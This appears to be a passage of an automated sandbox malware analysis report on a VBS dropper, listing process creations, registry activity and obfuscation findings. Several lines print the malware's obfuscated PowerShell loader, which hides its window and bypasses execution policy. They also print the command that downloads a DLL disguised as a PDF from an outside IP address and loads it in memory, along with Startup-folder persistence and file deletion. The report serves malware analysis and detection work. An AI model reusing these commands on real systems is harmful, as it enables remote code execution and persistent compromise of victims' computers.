Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth')) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220527 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dgawbhw.o05.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winVBS@30/28@2/3
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4364:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3020:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\daveCrpted.vbs"
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\explorer.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: cmmon32.pdb source: RegAsm.exe, 00000009.00000003.572055079.0000000001124000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: RegAsm.exe, 00000009.00000003.572055079.0000000001124000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000009.00000002.574613863.0000000002C5F000.00000040.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000003.469567195.0000000002810000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.574322688.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000003.471300384.00000000029AD000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: WAUgLeAhDG.pdb source: powershell.exe, 00000006.00000002.503711509.0000012FE07B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.484215461.0000012FC8389000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe
Source: Binary string: WAUgLeAhDG.pdbH|^| P|_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.503711509.0000012FE07B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.484215461.0000012FC8389000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ddscfIvqgW.pdb source: powershell.exe, 00000006.00000002.483842645.0000012FC8286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth')) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FF9F17C17EE push ss; ret 6_2_00007FF9F17C17EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041D336 push esp; ret 9_2_0041D338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004184C6 push edi; retf 9_2_004184C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004164EE pushfd ; iretd 9_2_004164EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041BDF2 push eax; ret 9_2_0041BDF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041BDFB push eax; ret 9_2_0041BE62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041BDA5 push eax; ret 9_2_0041BDF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041BE5C push eax; ret 9_2_0041BE62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BBD0D1 push ecx; ret 9_2_02BBD0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047BD0D1 push ecx; ret 23_2_047BD0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0321D336 push esp; ret 23_2_0321D338
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0321BE5C push eax; ret 23_2_0321BE62
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0321BDA5 push eax; ret 23_2_0321BDF8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0321BDF2 push eax; ret 23_2_0321BDF8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0321BDFB push eax; ret 23_2_0321BE62
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_032164EE pushfd ; iretd 23_2_032164EF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_032184C6 push edi; retf 23_2_032184C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041D336 push esp; ret 24_2_0041D338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004184C6 push edi; retf 24_2_004184C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004164EE pushfd ; iretd 24_2_004164EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041BDF2 push eax; ret 24_2_0041BDF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041BDFB push eax; ret 24_2_0041BE62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041BDA5 push eax; ret 24_2_0041BDF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041BE5C push eax; ret 24_2_0041BE62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0311D0D1 push ecx; ret 24_2_0311D0E4
Stores files to the Windows start menu directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk Jump to behavior
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
